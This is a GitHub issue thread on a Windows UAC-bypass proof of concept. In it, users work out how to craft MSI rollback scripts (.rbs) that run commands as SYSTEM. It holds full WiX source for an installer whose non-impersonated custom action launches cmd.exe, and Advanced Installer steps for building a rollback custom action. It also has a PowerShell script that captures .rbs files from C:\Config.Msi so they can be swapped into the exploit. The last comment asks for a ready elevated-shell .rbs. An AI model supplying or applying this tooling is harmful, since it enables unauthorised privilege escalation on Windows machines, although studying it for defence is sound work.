Wh04m1001 / IFaultrepElevatedDataCollectionUAC


How can I develop my .rbs file? #1

Open Bl4ckM1rror opened 1 year ago

Bl4ckM1rror commented 1 year ago

Hi, congratulations on your project, it is really awesome research!

One question: I have an issue with the trigger of the .rbs file.

I have created the following .msi which successfully triggers the payload (cmd.exe) as can be seen from the PoC.

[Screenshot 2022-10-17 22:25:37: the PoC spawning cmd.exe]

The problem is that when I replace cmd.rbs with my .rbs (inside C:\Config.Msi), nothing happens.

This is my source code for the execution of my payload :

<?xml version="1.0" encoding="UTF-8"?>
<!-- Complete WiX 3 source for the package described above (the original
     fragment lacked the Wix wrapper and used doubled backslashes in the path). -->
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Demo" Version="0.0.1" Manufacturer="demo" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

    <!-- Installs a copy of cmd.exe under Program Files\Example -->
    <Directory Id="TARGETDIR" Name="SourceDir">
        <Directory Id="ProgramFilesFolder">
            <Directory Id="INSTALLLOCATION" Name="Example">
                <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
                    <File Id="ApplicationFile1" Source="C:\Windows\System32\cmd.exe" KeyPath="yes"/>
                </Component>
            </Directory>
        </Directory>
    </Directory>

    <Feature Id="DefaultFeature" Level="1">
        <ComponentRef Id="ApplicationFiles"/>
    </Feature>

    <!-- Command line for the custom action; kept on one line so that
         [cmdline] does not expand with surrounding whitespace -->
    <Property Id="cmdline" Value="cmd.exe"/>

    <!-- Deferred, non-impersonated custom action: runs in the elevated
         msiexec service context. Only actions with Execute="rollback" are
         written into the rollback script (.rbs) in C:\Config.Msi. -->
    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand="[cmdline]" Return="ignore" Impersonate="no"/>

    <!-- Deferred/rollback actions must be scheduled between
         InstallInitialize and InstallFinalize -->
    <InstallExecuteSequence>
        <Custom Action="SystemShell" After="InstallInitialize"/>
    </InstallExecuteSequence>
</Product>
</Wix>

Can you help me? Thanks in advance.

Wh04m1001 commented 1 year ago

Hi,

Thanks :).

I used Advanced Installer to create the MSI and RBS file. You may want to change Execute="deferred" to Execute="rollback"? I didn't use WiX, so I'm not very familiar with it.

Bl4ckM1rror commented 1 year ago

Thank you for the quick reply :) I changed Execute="deferred" to Execute="rollback", but it didn't work.

Anyway, I read a lot of the documentation, and if I have understood correctly the entire process is:

  1. I have to create an .exe (for example, C++ code with a WinExec("cmd.exe", 0) instruction to spawn a cmd.exe process like in the PoC)
  2. I convert the previous .exe to .msi with Advanced Installer
  3. run the .msi
  4. run this PowerShell command: Get-ChildItem -Path C:\ -Filter *.rbs -Recurse -Force -ErrorAction SilentlyContinue, and I should find an .rbs (rollback script) file in the C:\Config.Msi folder
  5. Finally, I replace my payload (the previous .rbs file) with the cmd.rbs file (in the PoC project)

Did I understand correctly? If so, can I use both C# and C++? And Console or Application?

Thanks a lot!

ms17-o1o commented 1 year ago

I read this thread and it's really helpful. Thanks for the pointers on using Advanced Installer and snatching the .rbs file from the C:\Config.Msi folder. It worked for me.

In order to configure the .rbs file, one can install Advanced Installer, create a new Enterprise installer package, generate two custom actions (one deferred and one rollback), and sequence the rollback custom action just before the deferred custom action. I used "Launch EXE with Working Directory" for the rollback custom action type, and I set "File Path" to cmd.exe and "Command Line" to the command you want to execute. The working directory can be anything. Build the installer.

Before running the installer, run a PowerShell command (with administrator rights) that loops looking for any .rbs file in the C:\Config.Msi folder and copies it to a writable folder. Then run the installer. When the installation completes, you should see an .rbs file in the copied folder.

[Screenshot: snapshot-advanced-installer]
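
The capture step that Bl4ckM1rror (step 4 above) and ms17-o1o (the loop in the previous comment) describe, written out as an added PowerShell example. This is not code from the Wh04m1001 project or from anyone in this thread; the watch path, destination folder and timeout are assumed defaults.

```powershell
# Added example, not code from the Wh04m1001 project or from anyone in this thread.
# Polls C:\Config.Msi while an MSI installs and copies every .rbs rollback script
# it sees into a writable folder, re-copying on each pass so the last copy is the
# most complete one before msiexec deletes it at the end of the transaction.
# Start this in an elevated PowerShell window, then run the installer.
# $Watch, $Dest and $TimeoutSec are assumed defaults; adjust as needed.

param(
    [string]$Watch      = 'C:\Config.Msi',
    [string]$Dest       = "$env:TEMP\rbs-capture",
    [int]   $TimeoutSec = 300
)

New-Item -ItemType Directory -Path $Dest -Force | Out-Null
$captured = @{}                      # original path -> copied path
$deadline = (Get-Date).AddSeconds($TimeoutSec)

Write-Host "Watching $Watch for *.rbs (timeout ${TimeoutSec}s). Run the installer now."
while ((Get-Date) -lt $deadline) {
    # -Force is required: Config.Msi and its contents are hidden/system
    $rbs = Get-ChildItem -Path $Watch -Filter *.rbs -Force -ErrorAction SilentlyContinue
    foreach ($f in $rbs) {
        $target = Join-Path $Dest $f.Name
        try {
            Copy-Item -LiteralPath $f.FullName -Destination $target -Force -ErrorAction Stop
            if (-not $captured.ContainsKey($f.FullName)) {
                Write-Host "captured $($f.FullName) -> $target"
            }
            $captured[$f.FullName] = $target
        } catch {
            # msiexec may hold the file open or delete it between enumerate and
            # copy; just try again on the next pass
        }
    }
    Start-Sleep -Milliseconds 50
}

if ($captured.Count -eq 0) {
    Write-Warning "No .rbs seen. Is the install elevated, and does it schedule a rollback custom action?"
} else {
    foreach ($t in $captured.Values) {
        $h = (Get-FileHash -LiteralPath $t -Algorithm SHA256).Hash
        Write-Host ("{0}  {1} bytes  sha256={2}" -f $t, (Get-Item -LiteralPath $t).Length, $h)
    }
}
```

Save it as, for example, grab-rbs.ps1 and run it from an elevated prompt before starting the installer; the loop has to be already running because msiexec removes the rollback script as soon as the transaction commits. The script re-copies on every pass rather than stopping at the first hit, since the file is still being written when it first appears.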

kumarchanti commented 1 year ago

After changing Execute="deferred" to Execute="rollback" it did not work for me; I am not able to spawn cmd.exe with elevated privileges. Can you share the .rbs file which opens cmd.exe with elevated privileges?